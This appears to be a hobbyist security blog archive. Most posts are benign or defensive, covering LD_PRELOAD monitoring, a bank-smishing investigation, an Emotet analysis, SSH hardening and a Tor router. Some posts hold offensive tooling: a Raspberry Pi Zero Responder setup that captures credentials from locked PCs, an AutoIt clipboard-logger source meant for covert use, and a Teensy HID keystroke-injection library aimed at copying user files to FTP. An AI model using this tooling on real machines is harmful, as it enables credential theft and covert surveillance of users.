Userspace Linux Security Monitoring: PART 1

A couple months ago I read a post by @swagitda_ on the various approaches to monitoring a Linux system. I was already familiar with AuditD and its shortcomings. I was not familiar with LD_PRELOAD but the simplicity of the solution appealed to me. Running in userspace felt like a great idea. I started searching on google for projects that use LD_PRELOAD for monitoring with no luck. I found lots of code snippets to hook certain functions and how LD_PRELOAD can be used for privilege escalation under certain circumstances.

My C skills are rusty and I was itching to build a proof of concept solution to build a PoC monitoring solution that’s persistent and cannot be overridden by the user. In this post I will walk you through my experience making a rudimentary solution and hopefully generate interest for the great community to help start an open source project around it. Part 1 goes over what is LD_PRELOAD, why does it work and how to get started. Please note this is not a complete solution and definitely requires a lot more work. I am looking for help from the community to build a kick ass opensource Linux security solution. You can fork the code here

Figure 1: Sample Event log

The Linux Dynamic loader “ld-linux” is responsible for loading shared libraries in order of their position to resolve symbols used by the program during execution. LD_PRELOAD is an environment variable containing path(s) to shared librarie(s), or shared object(s), that the loader will load before any other shared library. This allows overriding / hooking functions to inject our logging code. Example below show a modified string compare function to log to screen which strings were compared during a program execution.

int strcmp(const char *s1, const char *s2) {
	static int (*func_strcmp) (const char *, const char *) = NULL;
	int retval = 0;
	if (! func_strcmp)
		func_strcmp = (int (*) (const char*, const char*)) dlsym (RTLD_NEXT, "strcmp");

	printf("Comparing: strcmp( \"%s\" , \"%s\" )\n", s1, s2);
	retval = func_strcmp (s1, s2);
	return retval;

The first magic happens here “dlsym (RTLDNEXT, "strcmp")”. “RTLDNEXT” finds the entry point of the original (strcmp) function. This allows us to snoop on the parameters passed to the function before passing it along to the original function. We need to add “#define GNUSOURCE“ to our source to make use of this. The second trick is the compiler. we call gcc with these parameters “-fPIC -nostartfiles -shared” parameter to ensure that our function is position independent, to prevent linking of standard _init, and to export a shared object. In my case the source file is called “monitor.c” and I used “gcc -fPIC -shared -nostartfiles -m64 -O3 monitor.c -o -ldl“ to compile the 64bit object and “gcc -fPIC -shared -nostartfiles -m32 -O3 monitor.c -o -ldl“ to compile the 32bit object. Once the object is compiled you are ready to hook applications by setting the LD_PRELOAD environment variable to your object. Alternatively you can call it inline.

Figure 2: Executing programs with LD_PRELOAD

Now if you are wondering well an attacker can easily reset the environment variable you are absolutely correct. However you can create a file called “/etc/” with the path to your monitor object. Then all dynamically linked binaries are forced to load that object Only a root user can modify This is actually really effective as there is no way to bypass this if is set. The screenshot below show a user logged into a remote device over SSH executing curl to get the wan IP of the system. The logs below show the output from the hooked functions. If you are interested this is the log generated by a test Kali Linux system during reboot.

Figure 3: Shared Object is hooked using system wide.

I will go over some of the challenges / issues I ran into, road map for this project and how to send these logs to an Elastic stack for Security monitoring. I believe there is a strong need for a solution like this and there is a huge potential in this approach. I would love to hear your feedback and any help i can get from my Linux / InfoSec community peers. Stay tuned for PART 2


Unmasking a Phishing campaign targeting major Canadian Banking customers

It was a lazy Sunday afternoon when I got a Twitter alert regarding a SMS Phishing customers of Royal Bank of Canada (RBC)

Smishing (SMS + Phishing)

Smishing (SMS + Phishing)

Being my natural curious self on a slow afternoon I started poking around the site and quickly discovered 2 things:

  1. hxxp://rbc[.]com[.]ssl-sec-mls-119[.]com/r/ - the /r/ portion intrigued me

  2. I also found a page called /r/counter/ from analyzing the form submission page


Going through the data in the counter page I quickly realized that these IP addresses belong to potential victims. out of the 701 records 60 users ~ 10% submitted all the data to the attacker. Sample below.


Now with this knowledge in mind I wanted to get back to the /r/ and fuzz that letter to see what else returned a HTTP status 200. I hypothesized that the ‘r’ in /r/ stood for “RBC” so I wanted to try ‘/c/’ for “CIBC” and to my delight i got a status 200 and a familiar looking website.


My immediate a next step was to determine if this has already been used to phish unsuspecting victims and made my way over to “/c/counter/” this time to my surprise I saw a total count of 1068 potential victims at approximately 10% that provided all information to the attacker. At this point I decided to fuzz ‘a..z’ and see if I get a status 200. I also wanted to collect the data from counter page. I was also convinced at this point that this attacker has been doing this for some time and I had to do something to unmask the operation and the infrastructure at the very least. The research uncovered 6 phishing pages targeting customers of the following Canadian banks.

  1. BMO - /b/

  2. CIBC - /c/

  3. RBC - /r/

  4. Desjardins - /d/

  5. Tangerine - /t/

  6. Scotia Bank - /s/

It was also obvious that all these sites were used or in use to phish Canadians.


The Infrastructure

  1. IP - 47[.]74[.]225[.]213

  2. URL - http://rbc[.]com[.]ssl-sec-mls-119[.]com/r/

The domain was registered on the 29th of December, 2018.

Hosted on  Alibaba cloud

Hosted on Alibaba cloud

111 Parent domains  -

111 Parent domains -

We notified the banks and saw response from CIBC and RBC. All the domains hosted on this server looked shady and build for crypto currency online casinos and phishing. Checkout the Pastebin link if you are interested. Once interesting finding from the logs was a submission from ::1 / loop back address from March 03, 2018. This further confirms that we are dealing with a persistent threat actor.

The attacker testing if the code works? Thoughts?

The attacker testing if the code works? Thoughts?

I would love to hear what you guys think. How should law enforcement and authorities respond to something like this? Do you feel the banks should do more to identify the impacted users and notify them? Thanks for reading my slow Sunday afternoon turned out to be fun and I hope you guys had fun reading.

Malware Analysis: Rech-49415128555.doc (Emotet)

August 21st quite a few people across organizations got this document in what looks like a large Phishing campaign. I wanted to understand what this malware does as this had very low detection on VirusTotal. Here is my effort to understand the malware and to record indicators for further hunting and investigation.

Step 1:

Identifying the malicious document

MD5: 2f8222f053940fcf6436759762967f45
SHA-1: bcd6f936d1195c265dab3b559a132e08f7a7052f

VirusTotal Link


Looks like some kind of dropper. It was interesting that VT first saw this file in 2010 and the first submission in August 21st. Where was it hiding for 7 years?

Step 2:

Detonating the malware

I run a couple of custom (Windows 7 & Windows 10) sandboxes with Sysmon from Sysinternals. All web traffic is intercepted with an intercepting web proxy. The network traffic is analyzed and all metadata is extracted and stored.

What did I learn? (End users are the weakest link)

The first thing the document does is it tricks the user into thinking that the document is actually locked / protected.


Enabling Macro executes Powershell

stage 1.JPG

This seems to download a binary with MD5 = C2FCFB112BB4824FC542D7AB8DFDB627. Searching on VT i realized this is Emotet malware. Not surprising this has over 50% detection rate.


Once this executes, it sets up persistence and moves itself from %TEMP% to %USERPROFILE%\AppData\Local\Microsoft\Windows\shedulesystem.exe

C2 IP: (Digital Ocean)




Now that I know this is Emotet I didnt want to waste too much time on this but I wanted to ensure I get all the IOCs out. Decoding the Base64 encoded PowerShell command gives me this:

decoded ps.JPG

Slightly modifying the code and printing the "URL" instead of Invoking it gave me all 5 domains:

stage domains.JPG

Step 3:

Back to basics


Take all the IOCs and make a use case for SIEM / SOC. #DFIR FTW! I hope you enjoy reading this as much as I enjoyed doing this.

UPDATE: We are selling these Tor Privacy routers

We are selling these #privacy #torbox routers for CA$35 + shipping. Message me if you are interested.
Paypal:    cmaj(at)
Bitcoin    156SLTpHjWRkLhkgz8mRNmbbwxuERZ3irY
You can DIY too

User manual

Make a cheap TOR anonymizer

I had a few friends ask if they could buy a cheap travel router that protects their internet activity as they travel around the globe. So my criteria:

  1. Cheap (<$20.00)
  2. Portable (ideally pocket size)

I knew I wanted a little travel router that supports OpenWRT and has enough RAM and storage to install TOR. There were a few routers that I liked but the NEXX WT3020H. There are a couple models that look the same. except for the "A" model all the other ones are the same. Don't get the A model it does not have enough resources to run Luci & TOR. Pictures below are for my WT3020H. I purchased mine from Aliexpress link

There are a few getting started articles online that explain how to install OpenWRT on this device and how to install TOR. Everything i seen so far is incomplete. It either allows for DNS leaks or don't allow .onion URLs. This is why I wanted to write this post and help anyone else that is trying to do the same. The script is agnostic of the hardware so should be able to install on other OpenWRT devices.

Installing OpenWRT Chaos Calmer on the device

Connect your computer to the LAN port on the device and follow along:

$ telnet
Connected to
Escape character is '^]'.

(none) login: nexxadmin
Password: y1n2inc.com0755

BusyBox v1.12.1 (2016-11-14 18:04:51 HKT) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# cd /tmp
# wget
Connecting to (
openwrt-15.05-ramips 100% |*******************************| 3328k 00:00:00 ETA
# mtd_write -r write openwrt-15.05-ramips-mt7620-wt3020-8M-squashfs-sysupgrade.bin mtd3
Unlocking mtd3 ...
Writing from openwrt-15.05-ramips-mt7620-wt3020-8M-squashfs-sysupgrade.bin to mtd3 ... [e]

The device should reboot and at this point you should be running OpenWRT 15.05. Release renew your computer's DHCP lease. Ensure you have an IP in the range of (probably

$ telnet
Connected to openwrt.lan.
Escape character is '^]'.
=== IMPORTANT ============================
Use 'passwd' to set your login password
this will disable telnet and enable SSH

BusyBox v1.23.2 (2016-11-14 03:03:02 CEST) built-in shell (ash)

CHAOS CALMER (15.05, r46767)
* 1 1/2 oz Gin Shake with a glassful
* 1/4 oz Triple Sec of broken ice and pour
* 3/4 oz Lime Juice unstrained into a goblet.
* 1 1/2 oz Orange Juice
* 1 tsp. Grenadine Syrup
[email protected]:/# passwd
Changing password for root
New password: 
Retype password: 
Password for root changed by root
[email protected]:/#

Installing TOR and configuring IPTABLE

SSH in to your device and complete the steps below:

$ ssh [email protected]
$ wget
$ mv Yd5mXksr
$ sh ./ 
$ reboot

After the device reboots login to Luci (

  1. Browse to Network -> Interfaces
  2. Click the "Edit" button for "LAN"
  3. Scroll down to the "DHCP Server" section and click on "Advanced Settings"
  4. Add an entry to "DHCP-Options "6," (without the quotes)
  5. Click Save and Apply (may take a couple of minutes)
  6. Reboot the router.

That's all the device will now intercept any TCP traffic and UDP DNS traffic on the LAN interface and route it through TOR. Making eves dropping impossible.

Please let me know what your thoughts are and if you have any questions. The script will be on Spend the $20 stay secure :)

Snagging creds from locked machines with RaspberryPi Zero

I get really excited anytime I get to use my RaspberryPi Zero. When I saw Rob Fuller's Tweet this morning (@mubix) i got really excited. Coincidentally I have a thing for single board computers and been playing with the USB Gadget mode for the Pi Zero last couple of weeks. As soon as I saw the tweet i knew i have to do this with the Pi Zero.


  1. RaspberryPi Zero
  2. 4GB or larger Micro SD Card
  3. OTG USB Cable
  4. USB Ethernet adapter or WiFi Dongle (initial setup)

I am going to assume that the reader knows how to flash an image onto the SD Card. I went with the Raspbian-lite version its better with RAM utilization on the Pi. Boot up the Raspberry Pi Zero and install the software required:

sudo apt-get install -y python git python-pip python-dev screen sqlite3 isc-dhcp-server
sudo pip install pycrypto
sudo su
cd ~/
git clone

Edit /etc/network/interfaces

Open /etc/network/interfaces with your favorite text editor and add the following to it:

auto usb0
allow-hotplug usb0
iface usb0 inet static

Configure DHCPD Settings: /etc/dhcp/dhcpd.conf

Edit /etc/dhcp/dhcpd.conf and replace the contents with the text below:

ddns-update-style none;
option domain-name "domain.local";
option domain-name-servers;
default-lease-time 60;
max-lease-time 72;
# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;
# wpad
option local-proxy-config code 252 = text;
# A slightly different configuration for an internal subnet.
subnet netmask {
option routers;
option local-proxy-config "";

Edit /etc/rc.local

Edit /etc/rc.local and add the following before exit 0:

# Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases
# Start DHCP server
# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python -I usb0 -f -w -r -d -F'

Create the configuration file for screen

sudo su; nano ~/.screenrc and add this:

# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log

Once the above steps are completed shutdown the Pi Zero (shutdown -h now) and remove the Micro SD Card. Connect the Micro SD card to your computer. We need to modify config.txt and cmdline.txt to turn the OTG port to a virtual Ethernet port. Please ensure that you are running a version of Raspbian released after May 2016

Edit config.txt

Add this after the last line:


Edit cmdline.txt

After rootwait (the last word on the first line) add a space and then 



Safely eject the Micro SD Card. Put it back in the Pi Zero. The device is ready use the USB OTG cable to connect it to the PC and Happy Hacking !

TOP 5: Personal Security Tips

I have been working in a Systems Administrator role for over 10 years and I am asked constantly by home users and peers at work on how to secure infrastructure and how to monitor effectively. One of the biggest issues with securing infrastructure is to identify potential attack vectors and to run risk analysis scenarios. Unfortunately this also means understanding who is trying to attack you or your business and whats in it for them.

I would like to start of with securing your personal infrastructure, and later show how this ties in with securing your business. The biggest reason for personal attack is identity theft.  Let's face it, money is the biggest motivation for this industry. Building a bot-net or zombie network is another reason why evil doers want to have control over your system(s). They want your compute power and they need your bandwidth to launch DDOS attacks against services. The world we live in, these types of attacks are orchestrated by two distinct groups:

  1. Identity Theft ==> Organized crime syndicates , family and friends
  2. Bot net ==> Spammers, Hacktivists, Script kiddies and organized crime syndicates

Now that we have identified the two most common type of personal attacks, let's see what we can do to secure ourselves.  I should point out a couple of things before we get to the nitty gritty of things:

  1. Paranoia is good. The consensus among people like us is to keep an open mind but question everything.
  2. If you make it difficult for attackers, they will quickly move along to the next unsuspecting victim.

Now that I got this off my chest, let's see what we can do in our personal lives to stay secure. I titled this article "TOP 5" so I will highlight the top five tips for personal security:

  1. Do not use the same password everywhere. Use different passwords for every service you use online, your home WiFi, your email, your password to log in to your computer, etc. Do not use simple passwords, passwords less than 8 character, or dictionary words. Instead use complex 9+ character passwords with numbers, upper, lower case characters, and special characters like ,[email protected]# etc. Try to use 2 factor authentication for services that offer it (Google, Facebook, Microsoft, Twitter, and many more). If you are thinking this is insane and how can I memorize such passwords you are thinking along the right path. Passwords that are easy to remember are easy to hack. Instead, use an application like Keepass or Password Safe to track your passwords. Keepass works on Windows, Linux, Mac OS and smartphones, and I use it for storing my passwords.
  2. Do not use pirated software. The issue with pirated software is that almost 99.9999% of the time the software is tampered with to allow you to use it by bypassing the activation / security in place to prevent unauthorized usage. What you almost never know is what is actually changed. We notice that application downloaded from shady websites may include malware that installs along with the software giving the attacker persistent access to your system. We have noticed this trend in the industry over and over again. Root kits embedded with applications downloaded from torrents. Here is a link for such an attack from 2011 ago to show that this is not a new trend. Another issue with cracked software is that it cannot be updated, leaving you stuck with an old, vulnerable version, and waiting to tempt fate.
  3. Regularly update your system and run a good antivirus software. Enterprises patch vulnerabilities in their system.  This is a cyclical process, and patches are created as vulnerabilities are discovered. The problem with running old software is that there is a very good chance that your system has a vulnerability and that there is an active exploit out there that is being used by evil-doers to gain access. If you like to wait before patching, prioritizing what to patch is a good idea too. Web browsers, plugins (flash, java. acrobat reader) are usually the most attacked software. If you like visiting questionable sites, or get emails from unknown people with attachments, use a sandboxed environment for your day to day stuff. Sandboxie is a great application that does this. If you use a professional antivirus solution, like Avast, it comes with this option built in. Also, please keep your firewall turned on. Firewalls were designed for a good reason, and they act as the first line of defense against online threats.
  4. Backup your systems regularly. We are starting to see an increasing growth of "Ransom Ware".  This is a new type of malware that holds your personal data hostage, and unless you pay, they won't provide you with the keys to decrypt your data. If you have regular backups, then you can easily restore the data from the backup. Both Windows and Mac OS have great backup solutions that are baked into the operating system for free. This way, if you have hardware damage and/or malware destroys your files, you can get your data back without breaking a sweat or your bank account. If you prefer to get a 3rd party solution for backup, there are professional solutions from companies like Acronis that can provide reliable solutions.
  5. If you've implemented points 1-4, you are already doing a good job of staying secure just Don't get social engineered and give up your data to strangers. This is one of the most important issues with security: the human factor. Be careful of what you post on social media, and be careful of what information you give out to people. If you tell everyone that your first pet's name was "fluffy" and your security question to your favorite mail service is what is your first pet's name? then it does not matter how secure your password is, it will be easy to reset it and take over your email service. This also means, if this email was used to signup for other services, those services are then getting owned by the attacker. I will leave this tip up for your imagination but this is why paranoia is a good friend. Question everything and be very careful about the information you give out freely. I want to add, avoid using open WiFi, or at least use a VPN connection when surfing from an open WiFi hotspot.

 Please let me know what you think in the comments below. If you disagree, I would love to see some feedback and constructive criticism as I prepare for the TOP 5: Enterprise Security Tips.

8 Node +1 Master: RaspberryPi Cluster running MPI and crunching numbers...

My quest for learning and building parallelism turned a new page. I mustered the courage to build a Raspberry Pi MPI cluster to test and code MPI. Couple of my friends at the Uiniversity of Alberta have been running MPI based code to crunch fluid dynamics problems. My goal was to build a farm of CPUs I can dedicate to do #STUFF at a very cheap price point.



  1. Has to be affordable
  2. Has to look presentable

Parts List:


  1. 9 x Raspberry Pi from
  2. 9 x 8GB Class 10 SD Cards (local computer store)
  3. 5V 12A, 60W PSU
  4. 18 x Female to Female jumper cables
  5. 18 x header pins
  6. 1 x PCB, 1 x 440uF capacitor, 1 x 220 & 1 x LED
  7. 16 Port 10/100 MB switch (had one available)
  8. 10 x CAT 5 patch cables




I used my 3D printer to print these frames I found on Thingiverse.



I used PLA and the finished product looked quite nice. took about 2 hours to print 4 frames. After about 5 hours I had the bottom and the top pieces printed. I also started installing Raspbian on the 9 SD cards. I used Win32DiskImager on a Windows 7 machine to create the SD cards. I started inserting the Pi(s) into the bottom pieces and then realized the biggest issue with this concept will be delivering power to the PIs. So I decided to build my own. The PIs draw about 450mA - 550mA depending on CPU load. with 9 of them I needed a PSU that can provide at least 5.5 A to be safe. I soon realized that when these PIs power on they can draw upto 700mA. So I purchased a 5V 12A switching PSU from my local store and built a simple power distribution circuit.


The dip switches can turn the PIs on or off. The main purpose of the 220uF capacitor is to smooth out the voltage probably not required. The red LED tell me that the PSU is ON and supplying power. I built 2 of these. was trying out couple different designs. The used the female jumpers to power the PIs.

2013-11-16 21.02.35.jpg

Once the PIs were powered up I SSHed into them and used "sudo raspi-config" to configure the CPU to run at 800MHz, gpu ram to 16MB and expanded the image to utilize 8GB. I could feel my goal getting close to completion with every key stroke. I wrote a little shell script to automate the MPI installation and configuration. Its not 100% automated but close enough:

apt-get update && apt-get upgrade -y
sudo apt-get install gfortran -y
mkdir mpi_install
cd mpi_install
tar xfz mpich2-1.4.1p1.tar.gz
cd mpich2-1.4.1p1
./configure && make && sudo make install
echo "Please answer the following questions to continue:"
sudo python

And that was it. My MPI cluster is ready. Since then I have run several example codes. Yes including the calculate the digits of PI.

I will post more with code examples and performance review as soon as get some more time. Till then Happy Hacking.


Secure SSH with 2 Factor Authentication


  1. This article applies to Debian based Linux and Ubuntu variants
  2. Does not work if the user's home drive is encrypted

Getting started:

I will be demonstrating how to use the Google authenticator PAM module for 2 factor. Google uses a time based OPT algorithm and it does not phone home to work. You will need an Android or iOS device with the Google Authenticator app installed. 

Install the Google authentication module by opening terminal and typing in:

sudo apt-get install libpam-google-authenticator

Generate Autehntication Key by running this command:


Follow the instructions to generate a key by pressing "y". Copy the secret key, the verification code and the scratch codes and store it securely. Scan the bar code from the app on your phone to initialize the code. Please note at this point we have installed the module and generated a key only. We still have to enable the PAM for SSH login manually. The steps below updates the "pam.d" config file to allow "" and "sshd_config" to set "ChallengeResponseAuthentication yes" and then restarts the SSH service.

Open pam.d/ssh with vi or nano:   

sudo nano /etc/pam.d/sshd and add the line

"auth required"

Open sshd_config and locate ChallengeResponseAuthentication line, and edit it to say:

sudo nano /etc/ssh/sshd_config
"ChallengeResponseAuthentication yes"

Restart SSH service:

sudo service ssh restart

Next time you SSH in you will be  prompted for your password and the OTP before you are authenticated.

SSH Tunnelling & Secure Browsing: Part III

ssh -D 8080:localhost

This time I will go over setting up SSH client in Linux, setting up key pairs and how to implement keys for authentication in Linux and in Windows.

Setting up tunnelling in Linux is as easy as typing in:


Read More

SSH Tunnelling & Secure Browsing: Part II

If you have completed Part I. You should have a running SSH server ready to tunnel all your needs. If you are on a PC running Microsoft's Windows operating system like me, download PuTTY 0.62-installer.exe from and install it.PuTTY will be our SSH client and we are going to cover:

  1. Password Authentication
  2. Asymmetric Key based authentication (RSA)

The second method being the most secure if implemented properly. Once Putty is installed it should have created an icon on your desktop. Open Putty and you will see the screen below:

Default PuTTY Screen

Fill up the fields as necessary Host Name: [username]@[server name]|[IP address] Port: The default port is 22 *** Connection type: SSH Saved Sessions: [Any name of your liking]

Once this information is filled in click on "Connection" > expand "SSH" > "Tunnels" and fill the tunnel information.

Tunnel Configuration

Click Add when done. On the menu to the left scroll all the way up and click "Session"and then click "Save" to save changes to the configuration. Click "Open" to launch the connection PuTTY will prompt that the Key is not recognized if this is the first time you are connecting. Click Yes to save the key in registry. I will go over key verification in another post. You will be prompted for your password at this stage. Please type it to complete the process. Once in open your browser of choice change the Proxy settings to SOCKSv5 Server / IP =, Port: 8090 and you will be tunneling traffic like 1337.

Part III will cover setting up SSH client in Linux, Public / Private key based encryption  in Linux and Windows. Hope you enjoyed, please comment below.

SSH Tunnelling & Secure Browsing: Part I

Checking your Facebook page from Starbucks? Checked your banking information from the Hotel WiFi? Or are you going to Defcon this year? 

Public internet is not secure and there is a need for secure browsing. There are many ways to achieve this and Obfuscate the traffic for eavesdroppers and protect ourselves against Man In The Middle (MITM) attack. After trying a few different solutions like torProject, Hotspot Shield and a few others like it I decided to set up my own SSH Server so that I can create a secure tunnel between my laptop and the SSH server and use that as a SOCKSv5 proxy. If you are still interested I will try to cover the following topics over the next few days:
  1. Install and configure a SSH Server (FreeBSD 9.0)
  2. Create users.
  3. Secure and harden the server.
  4. Configure SSH client (PuTTY) in windows
  5. Create Public and Private keys for authentication
  6. Set up Password-less login.
I wanted to point out that FreeBSD is really stable and uses very little resources to run and is my server of choice. I have tested the same with Debian 6.0.4 and works just as good. All the steps I am about to show should be easy to replicate on all *NIX type systems. I also wanted to point out that a Virtual Private Server will give you the best performance over hosting the SSH server at home.
Server Specs:

Installation Steps:

  1. Create the Guest Machine Guest VM Configuration
  2. Save and Power On. VM should boot from DVD press Enter to continue.
  3. Play this video for actual installation step

Configuration Steps:

  • Create a new user by typing "adduser" then Enter. P.S. add user to "wheel" group so that user can invoke "SU -"

FreeBSD Account Setup

  •  Login as the newly created user
  • mkdir ~/.ssh
  • chmod 700 .ssh
  • su -
  • Enter root password
  • cp /etc/ssh/sshd_config ~/sshd_config.orig
  • cd /home/n3onli8
  • cp /etc/ssh/sshd_config /home/n3onli8/sshd_config
  • vi sshd_config
  • I configured it to look like:

Protocol 2 HostKey /etc/ssh/ssh_host_rsa_key HostKey /etc/ssh/ssh_host_dsa_key

KeyRegenerationInterval 1h ServerKeyBits 1024 LoginGraceTime 2m PermitRootLogin no #StrictModes yes PubkeyAuthentication yes AuthorizedKeysFile    %h/.ssh/authorized_keys # Change to NO to enable built-in password authentication. PasswordAuthentication yes PermitEmptyPasswords no UsePAM no AllowAgentForwarding yes AllowTcpForwarding yes GatewayPorts yes X11Forwarding yes X11DisplayOffset 10 X11UseLocalhost yes PrintLastLog yes TCPKeepAlive yes PermitTunnel yes # override default of no subsystems Subsystem    sftp    /usr/libexec/sftp-server

  • Quit and Write changes
  • rm /etc/ssh/sshd_config
  • mv /home/n3onli8/sshd_config  /etc/ssh/sshd_config
  • /etc/rc.d/sshd restart
  • exit (exit su)

man ssh for better understanding of sshd_config

Part II will cover setting up putty in MS Windows

Thanks for reading. Comment below

Autoit: Clipboard Logger

This code will create an Executable approximately 300KB that will run on your computer logging clip board data to a text file in  %USERPROFILE%\ClipLog.log
  1. Download Autoit from
  2. Open SciTE
  3. Copy the code from below and paste it in SciTE
  4. Save the file and hit F5 to test the script
  5. Browse to %USERPROFILE%
  6. Open ClipLog.log to view logged clip board text.
  7. If it's all good then Ctrl + Break to stop the script
  8. Then Ctrl + F7 to compile the program into a .EXE
Stuff for version 2.0
  • Copy Log to ftp
  • Auto start program on power on.
  • encrypt the data in the log to hide the information.
; Clippy.au3
; n3onli8, 22, 12, 2011
; Version 1.0

#include <File.au3>
#include <Clipboard.au3>

While 1
$Clippy = _ClipBoard_GetData()
if $Clippy <> "0" Then
if $Clippy <> $txtClipboard Then
_FileWriteLog(@UserProfileDir & "\ClipLog.log",$Clippy)

Enjoy, Comment below.

<< iPrank >> Teensy ++

Enjoy Demo of n3onli8.h:

#include <n3onli8.h>

void AltF(){

void setup(){
  Minimize(); //Restoring Windows GUI+D

void loop(){

n3onli8.h Advanced PHUKD Library Complete

Finally Completed building the n3onli8.h teensy library for HID attacks. I wanna call this version 0.1 since I have big plans for this library. Hope you guys Enjoy:



#include "WProgram.h"

void CtrlAltDel();
void StartRUN();
void Enter();
void PrintScreen();
void Minimize();
void Menu();
void AltF4();
void Paste();
void Save();



#include "WProgram.h"
#include "usb_private.h"
#include "usb_api.h"
#include "n3onli8.h"

void CtrlAltDel()
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_ALT);

void StartRUN()


void Enter()

void PrintScreen()

void Minimize()


void Menu()
  Mouse.set_buttons(0, 0, 1);
  Mouse.set_buttons(0, 0, 0);

void AltF4()


void Paste(){

void Save(){

Save the 2 files in a folder called n3onli8.h and copy the folder in your Arduino\Libraries folder.
Remember >> Great Power Great responsibilities...
Cheers !!!

Other people that deserve my gratitude for HID hacking...

I have been researching online for other people who have been working along the lines of using a teensy or a similar HID device as a penetration testing tool. Check out these fellows:
  • Adrian Crenshaw at, has done some amazing work on the teensy platform. Had I been at Defcon 18, I would have known that he started this project back in 2010. Check out this page for information on his research and the Programmable HID USB Keystroke Dongle (PHUKD) Library.
  • Darren Kitchen from has been working on a project he likes to call the USB Rubber Ducky. Check out their forum to find out more.

Creating the attack Library... "n3onli8.h"

#include "WProgram.h"
#include "usb_private.h"
#include "usb_api.h"
#include "n3onli8.h"

void CtrlAltDel()

void StartRUN()



void Enter()

Check out @pastebin n3onli8.cpp
save the .h and .cpp file in a folder called n3onli8 in arduino-0022\arduino-0022\libraries\
please note the numbers may vary with your version of Arduino SDK

Send me your ideas on library functions.

Teensy Hacker ++

Earlier this year at Defcon I got introduced to the world of exploiting (HID) human interface devices. At first I was wowed by the simplicity of the attack. I could not wait to get my hands on my first Teensy from
Initial issues with the board:
  1. Comes with Mini - USB connector. (Creates suspicion, USB drive looks like a tool)
  2. Not enough on board memory to carry payload.
  3. On first run depending on the system its being plugged into there could be a fair bit of delay for the drivers to initialize which means the code may start executing before the keyboard is ready and the exploit is a FAIL!
Initial usage for Teensy:
  1. Prank tool: Mess with Desktop, random key strokes...You get the point
  2. Copy files from "Desktop" or "My Documents" to ftp
  3. Use power shell to wreck havoc!

Next Post: I will be putting up some code for the Teensy...